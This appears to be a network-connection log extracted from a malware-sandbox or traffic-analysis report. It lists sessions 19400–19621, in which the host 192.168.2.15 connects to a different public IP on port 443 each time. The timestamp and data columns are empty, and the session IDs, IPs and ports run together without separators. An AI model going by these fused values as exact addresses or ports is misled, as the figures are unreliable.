                                            19400192.168.2.1542080156.89.95.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19401192.168.2.1534378180.102.194.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19402192.168.2.154026871.113.114.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19403192.168.2.154101448.195.101.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19404192.168.2.1533568193.216.55.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19405192.168.2.1557648151.159.246.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19406192.168.2.154296486.26.18.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19407192.168.2.1543950105.208.48.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19408192.168.2.1552524171.31.112.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19409192.168.2.154811636.247.167.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19410192.168.2.154884644.251.197.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19411192.168.2.1551182216.30.246.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19412192.168.2.1538858182.202.243.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19413192.168.2.153599624.241.46.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19414192.168.2.1548024161.49.121.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19415192.168.2.155177894.253.211.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19416192.168.2.15382268.231.197.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19417192.168.2.15453602.91.76.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19418192.168.2.155033246.36.245.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19419192.168.2.15543609.210.249.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19420192.168.2.1545142170.133.89.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19421192.168.2.1534532106.187.204.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19422192.168.2.1554912212.22.185.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19423192.168.2.154798677.200.229.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19424192.168.2.1539800102.133.157.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19425192.168.2.154565889.18.180.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19426192.168.2.154510872.0.47.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19427192.168.2.155549080.118.204.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19428192.168.2.155502640.208.131.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19429192.168.2.155236413.61.69.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19430192.168.2.1533390140.38.97.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19431192.168.2.1535360132.77.196.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19432192.168.2.1537094130.12.222.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19433192.168.2.1555906139.52.101.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19434192.168.2.155358012.19.70.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19435192.168.2.155373867.26.200.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19436192.168.2.1544956206.83.191.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19437192.168.2.154766887.163.83.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19438192.168.2.1533736163.132.195.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19439192.168.2.1550294132.80.34.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19440192.168.2.1546188108.40.253.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19441192.168.2.1540210213.148.36.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19442192.168.2.1534898171.116.18.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19443192.168.2.1536140203.173.15.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19444192.168.2.1550230132.23.93.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19445192.168.2.1533422181.63.159.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19446192.168.2.1541562160.42.131.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19447192.168.2.1549164104.112.224.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19448192.168.2.154919660.39.131.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19449192.168.2.154764641.217.24.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19450192.168.2.1541878149.129.26.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19451192.168.2.156015225.211.111.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19452192.168.2.1536168174.136.108.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19453192.168.2.1548696179.64.72.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19454192.168.2.1560838107.19.83.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19455192.168.2.1559742165.169.238.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19456192.168.2.155957090.155.229.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19457192.168.2.153495893.148.200.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19458192.168.2.1536842139.35.130.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19459192.168.2.1549638146.71.2.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19460192.168.2.154903287.173.124.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19461192.168.2.1536594119.9.139.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19462192.168.2.1557894125.197.36.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19463192.168.2.1550304149.18.145.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19464192.168.2.1548342222.214.176.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19465192.168.2.1560946182.162.124.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19466192.168.2.1545968113.134.205.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19467192.168.2.1553742153.255.101.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19468192.168.2.1546802150.220.85.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19469192.168.2.1558560132.254.26.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19470192.168.2.155894699.130.211.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19471192.168.2.1539192219.150.200.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19472192.168.2.154057089.134.110.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19473192.168.2.1557106201.48.105.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19474192.168.2.1543672149.11.137.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19475192.168.2.1533552112.152.172.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19476192.168.2.154786861.7.155.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19477192.168.2.1539798183.30.102.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19478192.168.2.1550220132.140.82.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19479192.168.2.1544464138.78.39.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19480192.168.2.1552880117.33.166.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19481192.168.2.1558780193.67.143.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19482192.168.2.1544026174.248.133.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19483192.168.2.1537864207.172.38.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19484192.168.2.154211657.158.246.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19485192.168.2.154281477.39.164.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19486192.168.2.15585862.157.159.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19487192.168.2.1534854197.92.58.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19488192.168.2.1557182201.142.3.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19489192.168.2.155249051.94.30.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19490192.168.2.15532641.236.133.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19491192.168.2.153495825.11.15.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19492192.168.2.1535740137.147.180.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19493192.168.2.153685665.230.98.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19494192.168.2.1538362147.148.26.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19495192.168.2.1543632218.111.45.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19496192.168.2.153600288.137.174.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19497192.168.2.154055236.216.70.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19498192.168.2.1544602113.29.21.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19499192.168.2.1534780105.15.194.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19500192.168.2.1551666189.6.170.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19501192.168.2.1550374212.72.200.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19502192.168.2.155993473.139.167.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19503192.168.2.155462836.78.2.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19504192.168.2.154872246.223.156.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19505192.168.2.1548618122.53.242.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19506192.168.2.1555512116.205.123.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19507192.168.2.1555078167.146.109.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19508192.168.2.154315469.156.40.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19509192.168.2.1554196184.234.26.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19510192.168.2.15493845.247.157.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19511192.168.2.1558586178.40.111.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19512192.168.2.1552786217.57.25.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19513192.168.2.156061297.148.239.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19514192.168.2.153836661.144.242.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19515192.168.2.1554548111.253.130.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19516192.168.2.1550590217.186.17.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19517192.168.2.15364764.86.130.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19518192.168.2.1558866190.111.104.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19519192.168.2.154814681.241.30.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19520192.168.2.154256881.29.45.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19521192.168.2.153660663.65.89.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19522192.168.2.1547524207.25.13.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19523192.168.2.1557388177.192.163.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19524192.168.2.1552318172.65.224.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19525192.168.2.1559728201.238.28.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19526192.168.2.1557674164.103.58.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19527192.168.2.154344044.204.215.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19528192.168.2.155641082.214.191.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19529192.168.2.154777417.254.132.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19530192.168.2.1555114144.211.242.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19531192.168.2.1539710180.249.218.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19532192.168.2.1560172141.237.191.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19533192.168.2.1551900213.41.31.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19534192.168.2.1539420116.36.188.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19535192.168.2.155605653.131.160.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19536192.168.2.155268031.228.93.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19537192.168.2.155212891.255.141.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19538192.168.2.1534430216.31.164.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19539192.168.2.155919252.123.12.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19540192.168.2.155953890.38.10.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19541192.168.2.1540090116.59.198.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19542192.168.2.1532926149.156.89.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19543192.168.2.1537762187.25.168.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19544192.168.2.1560230118.10.71.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19545192.168.2.154856037.6.160.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19546192.168.2.155505045.200.23.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19547192.168.2.1554968153.10.242.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19548192.168.2.1550722162.47.17.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19549192.168.2.1552784199.86.92.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19550192.168.2.1557448197.43.115.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19551192.168.2.155111840.105.44.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19552192.168.2.1545788223.93.228.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19553192.168.2.155007661.17.10.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19554192.168.2.154803092.61.11.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19555192.168.2.155778061.255.109.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19556192.168.2.1539588123.219.178.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19557192.168.2.1546524157.92.74.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19558192.168.2.1556958186.211.1.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19559192.168.2.1534046146.125.74.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19560192.168.2.1552858186.150.47.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19561192.168.2.1546450203.164.71.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19562192.168.2.1547586222.76.11.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19563192.168.2.1552546155.165.34.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19564192.168.2.154652087.108.103.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19565192.168.2.1560302120.43.47.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19566192.168.2.155305070.98.60.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19567192.168.2.155359684.91.215.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19568192.168.2.154654690.76.110.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19569192.168.2.153933089.36.255.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19570192.168.2.154372488.197.20.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19571192.168.2.1555772178.138.144.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19572192.168.2.155923495.201.10.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19573192.168.2.1540856123.100.196.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19574192.168.2.154003284.194.144.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19575192.168.2.155463457.65.30.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19576192.168.2.15462145.52.63.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19577192.168.2.153423419.200.122.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19578192.168.2.154212478.187.178.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19579192.168.2.154685296.223.66.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19580192.168.2.1534892192.68.171.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19581192.168.2.1556804203.68.190.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19582192.168.2.1542700174.185.112.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19583192.168.2.1557096152.85.220.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19584192.168.2.1558686110.84.178.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19585192.168.2.155869225.140.7.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19586192.168.2.154652647.252.72.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19587192.168.2.154197832.181.63.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19588192.168.2.155733277.7.58.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19589192.168.2.155218280.45.226.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19590192.168.2.155510271.49.166.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19591192.168.2.1555938116.95.70.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19592192.168.2.155943638.112.221.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19593192.168.2.154167281.127.94.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19594192.168.2.1533098114.140.143.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19595192.168.2.155034612.190.34.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19596192.168.2.1548296199.111.92.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19597192.168.2.154868244.205.168.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19598192.168.2.154208685.183.205.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19599192.168.2.153824671.206.3.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19600192.168.2.1550128115.67.164.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19601192.168.2.154135078.139.239.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19602192.168.2.1553460118.37.46.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19603192.168.2.1533630174.74.66.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19604192.168.2.1542074150.235.147.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19605192.168.2.1554500167.0.196.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19606192.168.2.1539474100.189.110.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19607192.168.2.1554152155.38.187.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19608192.168.2.154437242.53.160.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19609192.168.2.154692813.236.23.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19610192.168.2.1536242144.16.199.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19611192.168.2.1543338174.117.162.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19612192.168.2.1555260109.40.170.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19613192.168.2.1533602138.2.58.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19614192.168.2.1553612162.16.141.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19615192.168.2.155492646.145.72.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19616192.168.2.15413301.207.20.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19617192.168.2.154760497.37.254.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19618192.168.2.156025440.158.34.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19619192.168.2.1535568133.40.254.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19620192.168.2.155904290.235.255.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19621192.168.2.155393017.157.252.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
